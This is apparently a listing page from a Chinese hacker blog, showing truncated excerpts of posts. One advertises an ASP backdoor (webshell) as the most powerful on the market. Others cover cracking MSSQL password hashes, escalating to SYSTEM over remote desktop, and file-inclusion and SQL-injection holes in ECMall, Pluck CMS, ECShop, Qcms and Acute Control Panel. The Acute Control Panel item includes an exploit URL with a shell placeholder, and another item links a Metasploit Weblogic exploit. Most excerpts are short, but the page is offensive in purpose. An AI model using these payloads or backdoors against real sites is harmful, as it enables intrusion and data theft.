导航

心动吧黑客BLOG

自发研究:须要多维思想而且要想不可能为可能的人才能做到

[置顶] [原创]心动吧数据库防下载小工具

 这一个文章和我以前发布的一个文章正好成了一个对比(文章连接),如果上一次是茅。那么此次这个就是盾了.为什么这样说?请看一下上一篇的文章。因为上一次是直接修改数据库的防下载表而不会造成数据沉淀在数据库里面。那么换一个思想来讲。假设在数据库当中并没有这一个防下载表。但是却有防下载功能。

例图:

[置顶] 心动吧警告:除20080508外并未发布其他版本

 先要在此感谢evil的提醒,昨天(2009-3-11)时上网后。发现网上有很多新版本的SHELL发布。而且还声称是终结版(我自己都没把自己终结。倒被你终结了).而且采用了加密手段。。现在我将下载回来程序。。打开并分析一下。现在把报告给大家。请慎重使用。。。。

[置顶] [原创]2009-1-18发布新版◆心动吧asp在线◆

心动吧asp在线-不加密加强版-是市面上目前功能最强的.速度最好的一款asp后门

 此内部版修正了:关于无端口的sql连接出错.通用三种SQL连接方式

破解MSSQL中的HASH密码

SQL服务器是怎样储存密码的?

SQL服务器使用了一个没有公开的函数pwdencrypt()对用户密码产生一个hash。通过研究我们可以发

现这个hash储存在mater数据库的sysxlogins表里面。这个可能已经是众所周知的事情了。

pwdencrypt()函数还没有公布详细的资料,我们这份文档将详

...

ECMall本地文件包含漏洞

明生注:这是一款很受欢迎的商城网,很多大型网站都用这一套商业程序。。。

演示地址: http://ecmall.discuz.net/

respond.php 48行

$pay_code = !empty($_REQUEST['code']) ? trim($_REQUEST['code']) : '';
...

用system权限登陆3389,让权限变得更强大

大家知道,SYSTEM是至高无上的超级管理员帐户。默认情况下,我们无法直接在登录对话框上以SYSTEM帐户的身份登录到Windows桌面环境。实际上SYSTEM帐户早就已经“盘踞”在系统中了。想想也是,连负责用户验证的Winlogon、Lsass等进程都是以SYSTEM身份运行的,谁还能有资格检验SYSTEM呢?既然SYSTEM帐户早就已经出现在系统中,所以只需以SYSTEM帐户的身份启动Windows的Shell程序Explorer,就相当于用SYSTEM身份登录Windows了。



  一、获得特权



  
1、执行“开始→运行”输入cmd回车打开命令提示符窗口。

  2、在命令提示符下输入如下命令并回车:

  taskkill /f /im explorer.exe

....

Acute Control Panel 1.0.0 三个 SQL注入漏洞及利用

Acute Control Panel 1.0.0 SQL注入

远程文件共享:

漏洞页面:container.php

 

<?php include_once($theme_directory."/sidebar.php"); ?>

利用:

http://127.0.0.1/themes/container.php?theme_directory=[Shell]



漏洞页面:

Weblogic 0day - JSESSIONID cookie value overflow

From: Sowhat

Metasploit更新了,0day,顶。

这个漏洞一般的web fuzzer应该都能找到吧



http://trac.metasploit.com/browser/framework3/trunk/modules/exploits/windows/http/bea_weblogic_jsessionid.rb?rev=6406

 

[原创]Remotelyanywhere连接方法的笔记

作者:心动吧明生KISS

  这是关于一个国外远程控制的日志..首先先看一下什么是Remotelyanywhere("以下简称:Rtyy")和pcAnywhere差不多..

     Rtyy是一个小巧的,利用浏览器进行远程控制的小程序。把它安装在NT计算机上。然后你就可以通过任何浏览器对远程计算机进行控制了。通过它,你可以管理远程计算机上的各种服务、进程、用户和

...

Qcms1.0漏洞解析

如下:

1.可以下载数据库。

2.注入:

后台的登陆文件

见Login.asp(登陆的判断处理)

代码如下:

admin_name=trim(request.Form("admin_name"))

admin_password=trim(request.Form("admin_password"))

admin_password=md5(admin_password)

....

Pluck CMS 4.6.1 (module_pages_site.php post) LFI Exploit

<?php

/*

pluck v 4.6.1 LFI exploit

autor : Alfons Luja

Vuln is in \data\modules\blog\module_pages_site.php

...

$includepage = 'blog_include.php';

//Only set 'view post'-page if a post has been specified

if (isset($_GET['post'])) {

//Check if post exists, and include information

if (file_exists('data/settings/modules/blog/posts/'.$_GET['post'])) {

include('data/settings/modules/blog/posts/'.$_GET['post']);

$module

....

ECShop注射漏洞

 if (empty($_GET['type']))

    {

        ...

    }

    elseif ($_GET['type'] == 'collection')

    {

        ...

...

ASp fso组件(第十二节) 再续

明生注: 以前的内容补充得不够详细。所以今天特意再来加一些新内容.内容转自网络

   此处的FSO操作函数包含了很多操作模式。希望对大家有用呀,时间关系未能把注释全部填写上

目录:
   使用FSO修改文件函数
   使用FSO写文件某一行的函数
   使用FSO添加文件新行的函数
   使用FSO读取文件某一行的函数
   使用FSO读取文件内容的函数
   使用FSO检查文件内容是否空的函数
   使用FSO读文件最后一行的函数
   使用FSO生成文件
   使用FSO检查是否有文件
   使用FSO删掉文件

....

分页:[«]14[15][16][17][18][19][20][21][22][23][24][25][26][27][28][»]

日历

<< 2014-4 >>

Sun

Mon

Tue

Wed

Thu

Fri

Sat

1

2

3

4

5

6

7

8

9

10

11

12

13

14

15

16

17

18

19

20

21

22

23

24

25

26

27

28

29

30

站内搜索

Copyright ⊙ 2004-2009 心动吧 UrL:ABCXD.CoM All RiGhts Reserved